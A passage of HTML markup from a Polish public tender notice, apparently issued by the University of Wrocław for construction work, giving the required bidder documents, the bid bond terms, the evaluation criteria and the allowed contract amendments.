id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Tak</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę, którego oferta została najwyżejoceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenianastępujących oświadczeń lub dokumentów, o których mowa w art. 25 ust.1 pkt 3 Pzp- wykazującychbrak podstaw do wykluczenia wykonawcy z postępowania o udzielenie zamówienia: 1.1. Odpisu zwłaściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębneprzepisy wymagają wpisu do rejestru lub ewidencji, w celu potw. braku podstaw wykluczenia napodstawie art. 24 ust. 5 pkt 1 Pzp; 1.2. Dokumentów dotyczących podmiotów trzecich, w celuwykazania braku istnienia wobec nich podstaw wykluczenia - jeśli wykonawca polega na zasobachpodmiotu trzeciego. 1.3. W przypadku złożenia oferty przez wykonawców wspólnie ubiegających sięo udzielenie zamówienia dokumentów dotyczących każdego z wykonawców, odpowiednio w zakresie,w którym każdy z Wykonawców spełnia warunki udziału. W przypadku wskazania przez Wykonawcęw Formularzu oferty na ogólnie dostępne, bezpłatne, elektroniczne bazy danych, Zamawiającyskorzysta z tych dokumentów dla potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3,pobierając je samodzielnie. Jeżeli oświadczenia i dokumenty, o których mowa powyżej sporządzone sąw języku obcym, Wykonawca zobowiązany jest do przedstawienia ich tłumaczenia na język polski. 2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,zamiast dokumentów o których mowa w pkt 1.1- składa dokument lub dokumenty wystawione wkraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcyprzed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 3.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkaniama osoba, której dokument dotyczy nie wydaje się dokumentów, o których mowa w pkt 2 zastępuje sięje dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby alboosób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorząduzawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkaniawykonawcy lub miejsce zamieszkania tej osoby, wystawionym w terminie odpowiednio jak dladokumentów, o których mowa powyżej. 4. Wykonawca w terminie 3 dni od dnia zamieszczenia nastronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP, przekaże zamawiającemuoświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o którejmowa w art. 24 ust. 1 pkt. 23 ustawy PZP (wzór oświadczenia załącznik nr 5 do SIWZ) - w formieoryginału lub kopii poświadczonej za zgodność z oryginałem. Wraz ze złożeniem oświadczenia,wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą dozakłócenia konkurencji w postępowaniu o udzielenie zamówienia. W przypadku wspólnego ubieganiasię o zamówienie przez Wykonawców, ww. oświadczenie składa każdy z Wykonawców wspólnieubiegających się o zamówienie.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę, którego oferta została najwyżejoceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenianastępujących oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 pkt 1 Pzp -potwierdzających spełnianie przez Wykonawcę warunków udziału w postępowaniu o udzieleniezamówienia: 1.1. Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 latprzed upływem terminu składania a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których robotyte zostały wykonane, z załączeniem dowodów określających, czy te roboty budowlane te zostaływykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane z godnie zprzepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, sąreferencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane byływykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty -Załącznik nr 6 do SIWZ; 1.2. Wykazu osób,skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególnościodpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ichkwalifikacji zawodowych, uprawnień do świadczenia i wykształcenia niezbędnych do wykonaniazamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją opodstawie do dysponowania tymi osobami -Załącznik nr 7 do SIWZ; 1.3. Dokumentów dotyczącychpodmiotów trzecich, w celu wykazania spełniania warunków udziału w postępowaniu w zakresie wjakim Wykonawca powołuje się na ich zasoby, - jeśli wykonawca polega na zasobach podmiotutrzeciego. 1.4. W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się oudzielenie zamówienia, dokumentów dotyczących każdego z Wykonawców, odpowiednio w zakresie,w którym każdy z Wykonawców spełnia warunki udziału.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Na potrzeby badania i oceny ofert, oferta musi zawierać następujące oświadczenia i dokumenty: 1)Formularz oferty sporządzony według wzoru stanowiącego Załącznik nr 1 do SIWZ - w formieoryginału; 2) Kosztorys ofertowy uproszczony sporządzony na podstawie przekazanego przezZamawiającego przedmiaru robót - w formie oryginału; 3) Aktualne Oświadczenia, o niepodleganiuwykluczeniu oraz spełnianiu warunków udziału w postępowaniu zgodnie z art. 25a ustawy Pzp,wymienione w rozdz. VI pkt 1-3 tj., Załączniki nr 2 i 3 do SIWZ - w formie oryginału; 4)Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniuwykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów doniej załączonych - w formie oryginału; 5) W przypadku złożenia oferty wspólnej przez kilkuWykonawców, należy przedstawić pełnomocnictwo - w formie oryginału, ustanawiające pełnomocnikado reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania izawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna wskazywaćrodzaj uprawnień, do których upoważniony jest pełnomocnik. 6) Zobowiązanie podmiotów trzecich dooddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia(Załącznik nr 4 do SIWZ jeśli dotyczy) - w formie oryginału lub kopii poświadczonej za zgodność zoryginałem. 2. Wraz z ofertą nie należy składać dokumentów wymienionych w sekcji III. 4 i III.5.Dokumenty te składa Wykonawca, którego oferta została najwyżej oceniona, dopiero po otrzymaniuwezwania Zamawiającego.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości: 3 500,00 zł(słownie złotych: trzy tysiące pięćset). 2. Wadium może być wnoszone w jednej lub kilkunastępujących formach: a) pieniądzu, b) poręczeniach bankowych lub poręczeniach spółdzielczej kasyoszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; c)gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przezpodmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniuPolskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r. poz. 359 i 2260 oraz z 2017 r. poz.1089, 1475 i 2201). 3. Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemneżądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta dowypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5ustawy Pzp. 4. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowyUniwersytetu Wrocławskiego: Santander Bank Polska S.A. we Wrocławiu 12 1090 2503 0000 00011257 6100 z dopiskiem: wadium, nr postępowania: BZP.2412.10.2019.BO 5. Wadium w formiepieniężnej winno znaleźć się na wskazanym rachunku Zamawiającego do terminu składania ofert.Wadium wniesione w pieniądzu uznaje się za wniesione z chwilą jego wpłynięcia na wskazane kontoZamawiającego. Dokument potwierdzający dokonanie przelewu zaleca się załączyć do oferty. 6.Pozostałe niepieniężne formy wadium, winny być złożone w oryginale w Kwesturze UniwersytetuWrocławskiego przy pl. Uniwersyteckim 1 we Wrocławiu (Dział Finansowy pok. nr 108, I piętro,okienko nr 1) do terminu składania ofert. Kopię zaleca się dołączyć do oferty. 7. Wadium musizabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, w którym upływa terminskładania ofert. 8. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborzeoferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego ofertazostała wybrana jako najkorzystniejsza, z zastrzeżeniem przypadku określonego w art. 46 ust. 4austawy. 9. Zamawiający zwraca wadium Wykonawcy, którego oferta została wybrana jakonajkorzystniejsza niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego orazwniesieniu zabezpieczenia należytego wykonania umowy. 10. Zamawiający zwraca niezwłoczniewadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 11. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium napodstawie 46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybranajako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, októrym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń lubdokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którymmowa w art. 25a ust.1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa wart. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jakonajkorzystniejszej. 13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca,którego oferta została wybrana: a) odmówił podpisania umowy w sprawie zamówienia publicznego nawarunkach określonych w ofercie, b) nie wniósł wymaganego zabezpieczenia należytego wykonaniaumowy, c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczynleżących po stronie Wykonawcy. 14. Zasady wnoszenia wadium określone w niniejszym Rozdzialedotyczą również przedłużania ważności wadium oraz wnoszenia nowego wadium w przypadkachokreślonych w ustawie. 15. Zamawiający odrzuci ofertę na podstawie art. 89 ust. 1 pkt. 7b jeżeliwadium nie zostało wniesione lub zostało wniesione w sposób nieprawidłowy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji na przedmiot zamówienia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>35,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin wykonania zamówienia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>5,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Ze względów losowych dopuszcza się zmianę przedstawicieli Wykonawcy, posiadających wskazane wUmowie kwalifikacje. 2. Ze względów organizacyjnych leżących po stronie Wykonawcy dopuszcza sięcałkowitą rezygnację ze zgłoszonych Podwykonawców oraz zmianę zgłoszonych przez WykonawcęPodwykonawców w trakcie realizacji Umowy, wymienionych w § 4 Umowy. 3. Zgodnie z art.144 ust.1Ustawy PZP przewiduje się zmianę sposobu wykonania przedmiotu Umowy, gdy: a) Wykonawca dokonazmiany zgłoszonego w ofercie zakresu rzeczowego wykonywanego przy udziale Podwykonawcy, zzachowaniem terminu wykonania przedmiotu Umowy, b) Wykonawca dokona zmiany Podwykonawcylub zrezygnuje z Podwykonawcy, przy czym, w przypadku gdy Wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu, powoływał się na zasoby tego Podwykonawcy na zasadachokreślonych w art.36b ust.2 ustawy PZP, w przypadku gdy zmiana lub rezygnacja z podwykonawcydotyczy podmiotu na którego zasoby wykonawca powoływał się, na zasadach określonych w art.22 aust.1, w celu wykazania spełniania warunków udziału w postępowaniu wykonawca jest zobowiązanywykazać Zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia jew stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakciepostępowania o udzielenie zamówienia, c) Wykonawca zgłosi Zamawiającemu realizację przedmiotuzamówienia przez Podwykonawców jeśli zajdzie potrzeba wykonania zamówienia przy pomocypodwykonawców, pomimo nie wskazania w ofercie żadnej części zamówienia przeznaczonej dowykonania w ramach podwykonawstwa - przy spełnieniu warunków zawartych w § 1 ust. 6, § 4, § 5 ust.8 i § 14 ust. 2 Umowy, z zachowaniem terminu wykonania przedmiotu Umowy. 4. Zmiana stawkipodatku VAT od towarów i usług w trakcie realizacji Umowy pociąga za sobą zmianę wynagrodzeniabrutto określonego w § 3 ust.1 bez konieczności zmiany niniejszej Umowy. 5. W razie zaistnienia istotnejzmiany okoliczności powodującej, że wykonanie Umowy nie leży w interesie publicznym, czego niemożna było przewidzieć w chwili zawarcia Umowy, Zamawiający może odstąpić od Umowy w terminie30 dni od powzięcia wiadomości o tych okolicznościach. W przypadku, o którym mowa powyżejWykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy (art. 145ustawy Prawo zamówień publicznych). 6. Wszelkie zmiany Umowy wymagają formy pisemnej podrygorem nieważności. 7. W przypadku konieczności wykonania zwiększonego zakresu robótbudowlanych niewykraczającym swym zakresem poza przedmiot zamówienia - w odniesieniu do zakresuzamówienia opisanego przedmiarami robót zamieszczonymi w postępowaniu przetargowym - dopuszczasię wydłużenie terminu realizacji przedmiotu zamówienia do 14 dni kalendarzowych ponad terminokreślony w § 6 ust.1 Umowy przy uwzględnieniu treści § 14 ust. 8 i ust. 9 Umowy. 8. Ze względu nakwaterowanie studentów w obiekcie dopuszcza się wydłużenie terminu zakończenia realizacji przedmiotuzamówienia do 14 dni kalendarzowych ponad termin określony w § 6 ust.1 Umowy przy uwzględnieniutreści § 14 ust. 7 i ust.9 Umowy. 9. W przypadku wystąpienia niekorzystnych warunków pogodowych,uniemożliwiających wykonywanie robót budowlanych lub powodujących ich przerwanie (np. opadydeszczu, opady śniegu, niska temperatura powietrza lub innych warunków atmosferycznych, które zewzględów technologicznych 